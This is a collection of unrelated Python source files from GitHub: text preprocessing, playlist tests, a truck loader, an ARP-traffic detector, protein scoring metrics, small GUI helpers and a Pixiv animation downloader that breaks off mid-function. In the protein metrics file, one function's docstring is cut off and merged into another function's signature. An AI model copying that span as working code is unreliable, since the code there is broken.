self.stop_words.discard(\"hadn't\")\n self.stop_words.discard(\"don't\")\n \n # some words that have to be removed ... unnecessary words\n self.remove_words=[\".\",\"..\",\"...\"]\n \n def sent_tokenize(self,data):\n '''\n Used to break the review into sentences. But we don't need to break the review into sentences\n '''\n \n # joining all the sentnces in the review by emoving '.' \n data=data.replace(\".\",\" \")\n return data\n\n def word_tokenize(self,sent):\n '''\n Breaks the sentence into tokens. \n Tweet Tokenizer has been specifically used for thsi task \n since the reviews were a type of free text and contained emojis \n and various other non-inmportant information which was non-relevant\n '''\n return self.tweettoken.tokenize(sent)\n \n def lemmatize(self,word):\n '''\n This function lemmatizes the word and brings it to a common word format.\n Also # was removed from the hastag words ... so that they can be processed further\n '''\n if(\"#\" in word):\n word=word.replace(\"#\",\"\")\n return self.lemmatizer.lemmatize(word)\n \n def is_stop_word(self,word):\n '''\n Function used to check if a given word lies in our stopword list\n '''\n if(word.lower() in self.stop_words):\n return True\n return False\n \n def has_number(self,word):\n '''\n Used to check if a word has a number\n '''\n return any(char.isdigit() for char in word)\n \n def deEmojify(self, word):\n '''\n used to remove emoji from a word\n '''\n return word.encode('ascii', 'ignore').decode('ascii')\n\n def is_extra_word(self,word):\n '''\n Removes all extra words by calling various functions defined above\n like removing punctuation words, words having numbers, @ words, stop words\n or any special words which has been marked in remove_words list\n '''\n if(self.has_number(word.lower())):\n return True\n if('@' in word.lower()):\n return True\n if(self.is_stop_word(word.lower())):\n return True\n if(word.lower() in string.punctuation):\n return True\n if(word.lower() in self.remove_words):\n return True\n if(len(word)==0):\n return True\n return False\n \n def reduce_lengthening(self,word):\n '''\n Shortens the words, if the characters in a word repeats.\n It would be redcued to having at max of 2 repeating chars.\n For eg:- aweeeesome=> aweesome\n '''\n pattern = re.compile(r\"(.)\\1{2,}\")\n return pattern.sub(r\"\\1\\1\", word)\n \n def preprocessing(self,data):\n '''\n This method uses all the above methods to preprocess a complete sentence.\n The argument given is the review which we want to process.\n '''\n \n # joining all the sentences in a review\n sents=self.sent_tokenize(data)\n # spliiting a sentence into words\n word_tokenized=self.word_tokenize(sents)\n \n # processing all the words and applying varios functions\n words=[]\n for j in word_tokenized:\n w=j.lower()\n w=self.deEmojify(w)\n w=self.reduce_lengthening(w)\n w=self.lemmatize(w)\n if(self.is_extra_word(w)==False):\n words.append(w)\n return words\n","repo_name":"thesagarsehgal/ReviewRatingClassifier","sub_path":"src/classifier/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37865758405","text":"import os\nimport unittest\nfrom shutil import copyfile\nfrom library import Song, Playlist\n\n\nclass TestSong(unittest.TestCase):\n \n def setUp(self):\n self.song = Song(title=\"Odin\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"3:44\")\n self.second_song = Song(title=\"Odin\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"3:44\")\n self.better_song = Song(title=\"Habibi\", \n artist=\"Azis\", \n album=\"Napipai gooo\", \n length=\"5:16\")\n\n def test__str__(self):\n self.assertEqual(str(self.song), \n \"Manowar - Odin from The Sons of Odin - 3:44\")\n\n def test__eq__(self):\n self.assertTrue(self.song==self.second_song)\n self.assertFalse(self.song==self.better_song)\n\n def test__hash__(self):\n self.assertTrue(self.song.__hash__() == self.second_song.__hash__())\n self.assertFalse(self.song.__hash__() == self.better_song.__hash__())\n\n def test_length(self):\n self.assertEqual(self.song.length(seconds=True), '224')\n self.assertEqual(self.song.length(minutes=True), '3.73')\n self.assertEqual(self.song.length(hours=True), '0.06')\n self.assertEqual(self.song.length(), self.song._length)\n\n\nclass TestPlaylist(unittest.TestCase):\n\n def setUp(self):\n self.playlist = Playlist(name=\"Code\", repeat=True, shuffle=True)\n # Song instances:\n self.song = Song(title=\"Odin\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"3:44\")\n self.second_song = Song(title=\"Thor\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"4:32\")\n self.better_song = Song(title=\"Habibi\", \n artist=\"Azis\", \n album=\"Napipai gooo\", \n length=\"5:16\")\n \n def test_add_song(self):\n self.assertEqual(len(self.playlist.song_list), 0)\n self.playlist.add_song(self.song)\n self.assertEqual(len(self.playlist.song_list), 1)\n\n def test_remove_song(self):\n self.playlist.song_list = [self.song, \n self.second_song, \n self.better_song]\n self.assertEqual(len(self.playlist.song_list), 3)\n self.assertTrue(self.playlist.remove_song(self.song)) \n self.assertEqual(len(self.playlist.song_list), 2)\n self.assertFalse(self.playlist.remove_song(self.song))\n self.assertTrue(self.playlist.remove_song(self.second_song))\n self.assertTrue(self.playlist.remove_song(self.better_song)) \n self.assertEqual(len(self.playlist.song_list), 0)\n \n def test_add_songs(self):\n self.assertEqual(len(self.playlist.song_list), 0)\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.assertEqual(len(self.playlist.song_list), 3)\n\n def test_total_length(self):\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.assertEqual(self.playlist.total_length(), '13:32')\n\n def test_artists(self):\n self.assertFalse(self.playlist.artists())\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.assertEqual(self.playlist.artists(), \n {'Manowar': 2, 'Azis': 1})\n\n def test_next_song(self):\n self.assertEqual(self.playlist.next_song(), False)\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.playlist.repeat = False\n self.playlist.shuffle = False\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 2)\n self.assertEqual(len(self.playlist.played_songs), 1)\n self.playlist.next_song()\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 0)\n self.assertEqual(len(self.playlist.played_songs), 3)\n self.assertFalse(self.playlist.next_song())\n self.playlist.repeat = True\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 2)\n self.assertEqual(len(self.playlist.played_songs), 1)\n self.playlist.shuffle = True # TODO: implement randomness\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 1)\n self.assertEqual(len(self.playlist.played_songs), 2)\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 0)\n self.assertEqual(len(self.playlist.played_songs), 3)\n self.playlist.repeat = False\n self.assertFalse(self.playlist.next_song())\n \n def test_pprint_playlist(self):\n self.assertFalse(self.playlist.pprint_playlist())\n self.playlist.add_songs([self.song, \n self.second_song])\n self.assertEqual(self.playlist.pprint_playlist(),\n ['| Artist | Song | Length |',\n '| ------- | ---- | ------ |',\n '| Manowar | Odin | 3:44 |',\n '| Manowar | Thor | 4:32 |'])\n\n def test_save(self):\n self.playlist.name = ' '\n self.playlist.save()\n self.assertEqual(self.playlist.name, '-')\n os.remove('-.json')\n self.playlist.name = \"TestCode\"\n self.assertTrue(self.playlist.save())\n self.assertTrue(os.path.isfile('TestCode.json'))\n os.remove('TestCode.json')\n \n\n def test_load(self):\n self.assertFalse(Playlist.load('wrong.json'))\n copyfile('Code.json', 'test_code.json')\n new = Playlist.load('test_code.json')\n self.assertEqual(len(new.song_list), 3)\n os.remove('test_code.json')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"alexanderbackup/Python-backup","sub_path":"hackbulgaria/week07/MusicLibrary/test_library.py","file_name":"test_library.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41349596322","text":"import pandas as pd\nfrom Objects.Truck import *\n\n\ndef load_trucks_txt(filename):\n dataframe = pd.read_csv(filename, sep=';')\n if not dataframe.empty:\n trucks = []\n for _, row in dataframe.iterrows():\n trucks += [Truck(\n int(row['NODE_START_ID']),\n int(row['TRUCK_ID']),\n row['TRUCK_BRAND'],\n row['TRUCK_MODEL'],\n int(row['TRUCK_CAPACITY']),\n )]\n return trucks\n else:\n raise Exception(\"File is empty\")\n","repo_name":"diegoamusicr/MiningNSGA","sub_path":"Solver/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6751636770","text":"import pyshark\nimport operator\n\ndef arp_sweep():\n capture = pyshark.LiveCapture(interface='wlp2s0', display_filter = \"arp\")\n capture.set_debug()\n print('CAPTURING')\n while True:\n mac_addresses={}\n arp_count=0\n under_attack = 0\n for packet in capture.sniff_continuously(packet_count=200):\n dest_mac = packet.eth.dst\n packet_type = str(packet.arp.opcode) \n if packet_type == '1':\n arp_count+=1\n src_mac = packet.eth.src\n if src_mac not in mac_addresses:\n mac_addresses[src_mac]=1;\n elif src_mac in mac_addresses:\n mac_addresses[src_mac]+=1\n if arp_count > 100:\n if under_attack == 0:\n print('EXCESSIVE ARP TRAFFIC DETECTED, SOURCE MAC: ', max(mac_addresses.items(), key=operator.itemgetter(1))[0])\n return \n elif arp_count<100:\n under_attack=0\n\narp_sweep()\n","repo_name":"namanr17/host-intrusion-detection-system","sub_path":"arp_sweep_live.py","file_name":"arp_sweep_live.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45677639455","text":"\"\"\"Functions for computing scoring metrics on proteins\r\n\"\"\"\r\nimport math\r\nfrom itertools import combinations\r\nfrom math import pi as PI # noqa\r\nfrom typing import Optional, List, Tuple, Any\r\n\r\nimport torch\r\nfrom einops import repeat, rearrange # noqa\r\nfrom torch import Tensor\r\n\r\nfrom protein_learning.common.helpers import (\r\n get_eps,\r\n calc_tm_torch,\r\n default,\r\n masked_mean,\r\n exists,\r\n safe_norm\r\n\r\n)\r\nfrom protein_learning.common.protein_constants import (\r\n AA_INDEX_MAP,\r\n ALL_ATOM_POSNS,\r\n)\r\nfrom protein_learning.common.rigids import Rigids\r\nfrom protein_learning.features.masking.masking_utils import get_chain_masks, get_partition_mask\r\nfrom protein_learning.protein_utils.align.kabsch_align import kabsch_align\r\n\r\n\r\ndef count_true(x: Tensor) -> int:\r\n \"\"\"count the number of entries in x that are equal to True\"\"\"\r\n return x[x].numel()\r\n\r\n\r\ndef tensor_to_list(x: Tensor) -> List:\r\n \"\"\"Convert torch tensor to python list\"\"\"\r\n return x.detach().cpu().numpy().tolist()\r\n\r\n\r\ndef tensor_to_array(x: Tensor) -> List:\r\n \"\"\"Convert torch tensor to numpy array\"\"\"\r\n return x.detach().cpu().numpy()\r\n\r\n\r\ndef get_sep_mask(n: int, min_sep: int, max_sep: int, device: Any) -> Tensor:\r\n \"\"\"Get separation mask\"\"\"\r\n rel_sep = torch.abs(repeat(torch.arange(n, device=device), \"i -> () i ()\") -\r\n repeat(torch.arange(n, device=device), \"i -> () () i\"))\r\n # compute separation mask\r\n max_sep = max_sep if max_sep > 0 else n\r\n return torch.logical_and(rel_sep >= min_sep, rel_sep <= max_sep) # noqa\r\n\r\n\r\ndef batch_coords(predicted_coords: Tensor, actual_coords: Tensor, batched_len: int):\r\n \"\"\"(potentially) adds batch dimension to coordinates and returns whether\r\n coordinates already had a batch dimension\r\n \"\"\"\r\n batched = predicted_coords.ndim == batched_len\r\n actual = actual_coords if actual_coords.ndim == batched_len else actual_coords.unsqueeze(0)\r\n pred = predicted_coords if predicted_coords.ndim == batched_len else predicted_coords.unsqueeze(0)\r\n assert actual.ndim == pred.ndim == batched_len, f\"{actual.shape}, {pred.shape}, {batched_len}\"\r\n return batched, pred, actual\r\n\r\n\r\ndef compute_coord_lddt(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n cutoff: float = 15.,\r\n per_residue: bool = True,\r\n pred_rigids: Optional[Rigids] = None,\r\n pair_mask: Optional[Tensor] = None,\r\n thresholds = None,\r\n\r\n) -> Tensor:\r\n \"\"\"Computes LDDT of predicted and actual coords.\r\n\r\n If rigids are provided, the pLDDT will be taken w.r.t the local frame\r\n of the input.\r\n\r\n :param pred_rigids:\r\n :param predicted_coords: tensor of shape (b, n, 3) or (n,3)\r\n :param actual_coords: tensor of shape (b, n, 3) or (n,3)\r\n :param cutoff: LDDT cutoff value\r\n :param per_residue: whether to compute LDDT per-residue or for all coords.\r\n :return: LDDT or pLDDT tensor\r\n \"\"\"\r\n thresholds = default(thresholds,[0.5,1,2,4]) # plddt cutoff thresholds\r\n # reshape so that each set of coords has batch dimension\r\n batched, actual_coords, predicted_coords = batch_coords(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n batched_len=3\r\n )\r\n n = predicted_coords.shape[1]\r\n actual_dists = torch.cdist(actual_coords, actual_coords)\r\n if not exists(pred_rigids):\r\n pred_dists = torch.cdist(predicted_coords, predicted_coords)\r\n else:\r\n rel_coords = pred_rigids.apply_inverse(rearrange(predicted_coords, \"b n c -> b () n c\"))\r\n pred_dists = safe_norm(rel_coords, dim=-1)\r\n\r\n not_self = (1 - torch.eye(n, device=pred_dists.device)).bool()\r\n mask = torch.logical_and(pred_dists < cutoff, not_self).float() # noqa\r\n if exists(pair_mask):\r\n mask = pair_mask.float() * mask\r\n l1_dists = torch.abs(pred_dists - actual_dists).detach()\r\n\r\n scores = (1/len(thresholds))*sum([(l1_dists < t).float() for t in thresholds])\r\n\r\n dims = (1, 2) if not per_residue else (2,)\r\n eps = get_eps(l1_dists)\r\n scale = 1 / (eps + torch.sum(mask, dim=dims))\r\n scores = eps + torch.sum(scores * mask, dim=dims)\r\n return scale * scores if batched else (scale * scores)[0]\r\n\r\n\r\ndef compute_interface_tm(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n pred_rigids: Rigids,\r\n actual_rigids: Rigids,\r\n chain_indices: List[Tensor],\r\n normalize: bool = False,\r\n reduce: bool = False,\r\n):\r\n \"\"\"Interface TM score (Unnormalized and not reduced)\"\"\"\r\n tm_scale = lambda n: 0.5 if n <= 15 else 1.24 * ((n - 15.0) ** (1. / 3.)) - 1.8\r\n\r\n assert predicted_coords.ndim == actual_coords[0].ndim\r\n shape = predicted_coords.shape\r\n assert predicted_coords.ndim == 3, f\"input shape should be (b,n,3), got {shape}\"\r\n _, pair_masks, inter_pair_mask = get_chain_masks(n_res=actual_coords.shape[0], chain_indices=chain_indices)\r\n\r\n predicted_coords, actual_coords = map(lambda x: rearrange(x, \"b n c -> b () n c\"),\r\n (predicted_coords, actual_coords))\r\n pred_rel_coords = pred_rigids.apply_inverse(predicted_coords)\r\n actual_rel_coords = actual_rigids.apply_inverse(actual_coords)\r\n\r\n raise Exception(\"Not implemented\")\r\n\r\n\r\ndef get_inter_chain_contacts(\r\n coords: Tensor,\r\n partition: List[Tensor],\r\n atom_mask: Optional[Tensor],\r\n contact_thresh: float = 12,\r\n\r\n) -> Tensor:\r\n \"\"\"Get contact flags for pair features\"\"\"\r\n contacts = torch.cdist(coords.squeeze(), coords.squeeze())\r\n part_mask = get_partition_mask(n_res=sum([len(p) for p in partition]), partition=partition)\r\n part_mask = part_mask.to(contacts.device)\r\n contacts[~part_mask] = contact_thresh + 1\r\n pair_mask = torch.einsum(\"i,j->ij\", atom_mask, atom_mask)\r\n contacts[~pair_mask] = contact_thresh + 1\r\n return contacts < contact_thresh # noqa\r\n\r\n\r\ndef compute_interface_rmsd(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n chain_indices: List[Tensor],\r\n atom_mask: Optional[Tensor],\r\n contact_thresh: float = 10,\r\n align: bool = True,\r\n):\r\n assert len(chain_indices) == 2\r\n assert predicted_coords.ndim == actual_coords.ndim == 2\r\n contacts = get_inter_chain_contacts(\r\n actual_coords,\r\n chain_indices,\r\n atom_mask=atom_mask,\r\n contact_thresh=contact_thresh\r\n )\r\n interface_mask = torch.any(contacts, dim=-1)\r\n assert interface_mask.shape == actual_coords.shape[:1]\r\n if exists(atom_mask):\r\n assert atom_mask.shape == interface_mask.shape\r\n interface_mask = interface_mask & atom_mask\r\n\r\n interface_coords_actual = actual_coords[interface_mask]\r\n interface_coords_pred = predicted_coords[interface_mask]\r\n atom_mask = torch.ones(interface_coords_actual.shape[0])\r\n return compute_coord_rmsd(\r\n predicted_coords=interface_coords_pred,\r\n actual_coords=interface_coords_actual,\r\n atom_mask=atom_mask.to(interface_mask.device).bool(),\r\n per_res=False,\r\n align=align,\r\n )\r\n\r\n\r\ndef compute_coord_tm(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n norm_len: Optional[int] = None,\r\n align: bool = True\r\n) -> Tensor:\r\n \"\"\"Compute TM-Score of predicted and actual coordinates\r\n\r\n shape should be (b,n,3) or (n,3)\r\n \"\"\"\r\n assert predicted_coords.ndim <= 3\r\n # reshape so that each set of coords has batch dimension\r\n batched, actual_coords, predicted_coords = batch_coords(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n batched_len=3\r\n )\r\n if align:\r\n _, actual_coords = kabsch_align(align_to=predicted_coords, align_from=actual_coords)\r\n deviations = torch.norm(predicted_coords - actual_coords, dim=-1)\r\n norm_len = default(norm_len, predicted_coords.shape[1])\r\n tm = calc_tm_torch(deviations, norm_len=norm_len)\r\n return tm\r\n\r\n\r\ndef mean_aligned_error(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n mask: Optional[Tensor],\r\n per_residue: bool,\r\n fn=lambda x: torch.square(x),\r\n align: bool = True,\r\n):\r\n \"\"\"mean per-residue error w.r.t given function\"\"\"\r\n # reshape so that each set of coords has batch dimension\r\n batched, actual_coords, predicted_coords = batch_coords(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n batched_len=4 if per_residue else 3\r\n )\r\n if exists(mask):\r\n mask = mask if batched else mask.unsqueeze(0)\r\n assert mask.ndim == actual_coords.ndim - 1\r\n\r\n if align:\r\n _, actual_coords = kabsch_align(align_to=predicted_coords, align_from=actual_coords, mask=mask)\r\n\r\n tmp = torch.sum(fn(predicted_coords - actual_coords), dim=-1)\r\n mean_error = masked_mean(tmp, mask, dim=-1)\r\n return mean_error\r\n\r\n\r\ndef compute_coord_rmsd(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n atom_mask: Optional[Tensor] = None,\r\n per_res: bool = False,\r\n align: bool = True,\r\n) -> Tensor:\r\n \"\"\"Computes RMSD between predicted and actual coordinates\r\n\r\n :param predicted_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is number of atom types\r\n :param actual_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is number of atom types\r\n :param atom_mask: mask tensor of shape (...,n,a) if per_res is specified\r\n otherwise (...,n)\r\n :param per_res: whether to return deviation for each residue,\r\n or for the entire structure.\r\n :param align: whether to kabsch align coordinates before computing rmsd\r\n :return: RMSD\r\n \"\"\"\r\n mse = mean_aligned_error(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n mask=atom_mask,\r\n fn=torch.square,\r\n per_residue=per_res,\r\n align=align,\r\n )\r\n return torch.sqrt(mse)\r\n\r\n\r\ndef compute_coord_mae(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n atom_mask: Optional[Tensor],\r\n per_res: bool = True\r\n) -> Tensor:\r\n \"\"\"Computes mean l1 deviatoin between predicted and actual coordinates\r\n\r\n :param predicted_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is number of atom types\r\n :param actual_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is number of atom types\r\n :param atom_mask: mask tensor of shape (...,n,a) if per_res is specified\r\n otherwise (...,n)\r\n :param per_res: whether to return deviation for each residue,\r\n or for the entire structure.\r\n :return: Mean l1 coordinate deviation\r\n \"\"\"\r\n # reshape so that each set of coords has batch dimension\r\n return mean_aligned_error(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n mask=atom_mask,\r\n fn=lambda x: torch.sqrt(torch.square(x) + get_eps(x)),\r\n per_residue=per_res\r\n )\r\n\r\n\r\ndef per_residue_neighbor_counts(atom_coords: Tensor, mask: Optional[Tensor] = None, dist_cutoff=10):\r\n \"\"\"Computes the number of coordinates within a dist_cutoff radius of each input coordinate\r\n :param atom_coords: Tensor of shape (...,n,3).\r\n :param mask: ignore coordinate i if mask[...,i] is False (optional)\r\n :param dist_cutoff: cutoff distance for two coordinates to be considered neighbors\r\n :return: number of neighbors per atom\r\n \"\"\"\r\n batched = atom_coords.ndim == 3\r\n rel_dists = torch.cdist(atom_coords, atom_coords)\r\n dist_mask = torch.einsum(\"... n, ... m-> ... nm\", mask, mask) if exists(mask) else \\\r\n torch.ones(1, device=atom_coords.device).bool()\r\n exclude_self_mask = torch.eye(atom_coords.shape[-2], device=atom_coords.device)\r\n mask = torch.logical_and(dist_mask, exclude_self_mask.unsqueeze(0) if batched else exclude_self_mask)\r\n rel_dists[mask] = dist_cutoff + 1\r\n return torch.sum((rel_dists < dist_cutoff), dim=-1) # noqa\r\n\r\n\r\ndef compute_angle_mae(source: Tensor, target: Tensor) -> Tensor:\r\n \"\"\"computes absolute error between two lists of angles\"\"\"\r\n a = source - target\r\n a[a > PI] -= 2 * PI\r\n a[a < -PI] += 2 * PI\r\n return torch.abs(a)\r\n\r\n\r\ndef calculate_sequence_identity(pred_seq: Tensor, target_seq: Tensor) -> Tensor:\r\n \"\"\"Calculate average sequence identity between pred_seq and target_seq\"\"\"\r\n return torch.mean((pred_seq == target_seq).float())\r\n\r\n\r\ndef detect_disulfide_bond_pairs(target_seq: Tensor, target_coords: Tensor) -> List[Tuple[int, int]]:\r\n \"\"\"Returns Cysteine pairs forming disulfide bonds\"\"\"\r\n # calculate cystine positions\r\n cys_posns = torch.arange(target_seq.numel())[target_seq == AA_INDEX_MAP[\"CYS\"]]\r\n SG = ALL_ATOM_POSNS[\"SG\"]\r\n is_bond = lambda p1, p2: torch.norm(target_coords[p1, SG] - target_coords[p2, SG]) < 2.5\r\n return list(filter(lambda x: is_bond(*x), combinations(tensor_to_list(cys_posns), 2)))\r\n\r\n\r\ndef calculate_average_entropy(pred_aa_logits: Tensor):\r\n \"\"\"Calculate Average Entropy\"\"\"\r\n log_probs = torch.log_softmax(pred_aa_logits, dim=-1)\r\n probs = torch.exp(log_probs)\r\n return torch.mean(torch.sum(-probs * (log_probs * math.log2(math.e)), dim=-1)) # entropy\r\n\r\n\r\ndef calculate_perplexity(pred_aa_logits: Tensor, true_labels: Tensor):\r\n \"\"\"Calculate Perplexity\"\"\"\r\n ce = torch.nn.CrossEntropyLoss()\r\n return torch.exp(ce(pred_aa_logits, true_labels))\r\n\r\n\r\ndef calculate_unnormalized_confusion(pred_labels: Tensor, true_labels: Tensor):\r\n \"\"\"Calculate (un-normalized) confusion\"\"\"\r\n pred_one_hot, target_one_hot = map(lambda x: torch.nn.functional.one_hot(x, 21), (pred_labels, true_labels))\r\n return torch.einsum(\"n i, n j -> i j\", pred_one_hot.float(), target_one_hot.float())\r\n\r\n\r\ndef get_percentage_contacts(\r\n a: Tensor,\r\n b: Tensor,\r\n min_sep: int,\r\n max_sep: int,\r\n threshold: float = 8,\r\n pair_mask: Optional[Tensor] = None,\r\n):\r\n \"\"\"Get percentage of contacts in a that are common to b\r\n\r\n :param a: tensor of coordinates having shape (n,3) or (b,n,3)\r\n :param b: tensor of coordinates having shape (n,3) or (b,n,3)\r\n :param min_sep: minimum sequence separation to consider\r\n :param max_sep: maximum sequence separation to consider (use -1 to exclude cutoff)\r\n :param threshold: distance cutoff threshold for which two residues are considered\r\n to be in contact (i.e. if d_ij Tensor:\r\n \"\"\"Average L1-difference between predicted and actual coordinates\"\"\"\r\n _, actual_coords, predicted_coords = batch_coords(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n batched_len=3,\r\n )\r\n a, b = map(lambda x: torch.cdist(x, x), (actual_coords, predicted_coords))\r\n sep_mask = get_sep_mask(a.shape[1], min_sep=min_sep, max_sep=max_sep, device=a.device)\r\n\r\n return torch.mean(torch.abs(a - b)[sep_mask])\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/assessment/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":18299,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"20046388800","text":"from tkinter import *\nfrom functools import partial # To prevent unwanted windows\nimport random\n\nclass Start:\n def __init__(self, partner):\n\n self.start_frame = Frame(padx=10, pady=10)\n self.start_frame.grid()\n\n # Math Quiz Game Heading (row 0)\n self.math_quiz_label = Label(self.start_frame, text=\"Math Quiz Game\",\n font=\"Arial 19 bold\")\n self.math_quiz_label.grid(row=1)\n\n # Help button (row 2)\n self.help_button = Button(self.start_frame, text=\"Help/Rules\",\n command=self.to_quiz)\n self.help_button.grid(row=2, pady=10)\n\n def to_quiz(self):\n get_help = Help(self)\n\nclass Help:\n def __init__(self, partner):\n\n # Disable help button\n partner.help_button.config(state=DISABLED)\n\n # Help Quiz\n self.help_quiz =Toplevel()\n\n # If users press cross at top, closes help and 'releases' help button\n self.help_quiz.protocol('WM_DELETE_WINDOW', partial(self.close_help, partner))\n\n # Gui Frame\n self.help_frame = Frame(self.help_quiz, width=300)\n self.help_frame.grid()\n\n # Help Heading (row 0)\n self.how_heading = Label(self.help_frame, text=\"Help / Rules\",\n font=\"Arial 14 bold\")\n self.how_heading.grid(row=0)\n\n help_text=\"Choose an amount of questions 1 to 10 then. \" \\\n \"choose a level that will be suitable for you. \\n\\n \" \\\n \"The levels are Easy, Medium, Hard. Easy will contain plus and \" \\\n \"minus, Medium will contain only multiplications and lastly Hard \" \\\n \"will contain Division and higher numbers that will make it. \" \\\n \"complicated for some users. \" \\\n\n # Help text (row 1)\n self.help_text = Label(self.help_frame, text=help_text,\n justify=LEFT, wrap=400, padx=10, pady=10)\n self.help_text.grid(row=1)\n\n # Dismiss button (row 2)\n self.dismiss_btn = Button(self.help_frame, text=\"Dismiss\",\n width=10, font=\"Arial 15 bold\", bg=\"maroon\",\n command=partial(self.close_help, partner))\n self.dismiss_btn.grid(row=2, pady=10)\n\n def close_help(self, partner):\n partner.help_button.config(state=NORMAL)\n self.help_quiz.destroy()\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Math Quiz\")\n something = Start(root)\n root.mainloop()","repo_name":"martin1144/03_Math_Quiz_Game","sub_path":"Help_GUI_v1.py","file_name":"Help_GUI_v1.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38525499822","text":"import math\n\nimport PySimpleGUI as sg\n\n\ndef get_layout(text):\n returns = text.count('\\n')\n if returns == 0:\n layout = [[sg.Text(text, size=(50, math.ceil(len(text) / 50)))],\n [sg.CloseButton('Ok')]]\n else:\n layout = [[sg.Text(text, size=(50, math.floor(len(text) / 50) + returns))],\n [sg.CloseButton('Ok')]]\n return layout\n\n\ndef show_error_window(text, location=(600, 100)):\n layout = get_layout(text)\n error_window = sg.Window('Error', layout=layout, element_justification='c', finalize=True,\n location=(location[0], location[1]))\n\n error_window.read()\n\n\ndef show_help_window(text, location=(600, 100)):\n layout = get_layout(text)\n help_window = sg.Window('Help', layout=layout, element_justification='c', finalize=True,\n location=(location[0], location[1]))\n\n help_window.read()\n","repo_name":"robinfaber97/NetLogoDOE","sub_path":"NetLogoDOE/src/gui/custom_windows.py","file_name":"custom_windows.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37892037106","text":"#!/bin/usr/env python\n\nimport argparse\nimport json\nimport os\nimport re\nimport shlex\nimport subprocess\nimport sys\nimport tempfile\nimport urllib.request\nimport zipfile\n\n\ndef get_ugoira_frames(pixiv_id, output_path, verbose=False):\n base_pixiv_url = f'https://www.pixiv.net/en/artworks/{pixiv_id}'\n meta_pixiv_url = f'https://www.pixiv.net/ajax/illust/{pixiv_id}/ugoira_meta'\n user_agent = 'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0'\n\n verbose_print(verbose, f'Fetching URL \"{meta_pixiv_url}\"')\n ugoira_json = None\n\n req = urllib.request.Request(meta_pixiv_url)\n req.add_header('Referer', base_pixiv_url)\n req.add_header('User-Agent', user_agent)\n req.add_header('Accept', 'application/json')\n\n with urllib.request.urlopen(req) as res:\n res_text = res.read().decode('utf-8')\n\n try:\n ugoira_json = json.loads(res_text)\n except json.decoder.JSONDecodeError:\n return False\n\n req = urllib.request.Request(ugoira_json['body']['originalSrc'])\n req.add_header('Referer', base_pixiv_url)\n req.add_header('User-Agent', user_agent)\n\n ugoira_zipfile = os.path.join(tempfile.gettempdir(), f'ugoira_{pixiv_id}.zip')\n chunk_size = 4 * 1024\n\n with urllib.request.urlopen(req) as res, open(ugoira_zipfile, 'wb') as out_file:\n while True:\n chunk = res.read(chunk_size)\n if chunk:\n out_file.write(chunk)\n else:\n break\n\n verbose_print(verbose, 'Extracting ugoira zip file')\n with zipfile.ZipFile(ugoira_zipfile, 'r') as zip_ref:\n zip_ref.extractall(output_path)\n\n verbose_print(verbose, 'Deleting ugoira zip file')\n os.remove(ugoira_zipfile)\n\n verbose_print(verbose, 'Creating FFmpeg concat demuxer file')\n\n # https://superuser.com/questions/617392/ffmpeg-image-sequence-with-various-durations\n ffconcat_file = os.path.join(output_path, 'ffconcat.txt')\n with open(ffconcat_file, 'w') as out_file:\n out_file.write('ffconcat version 1.0\\n\\n')\n\n # 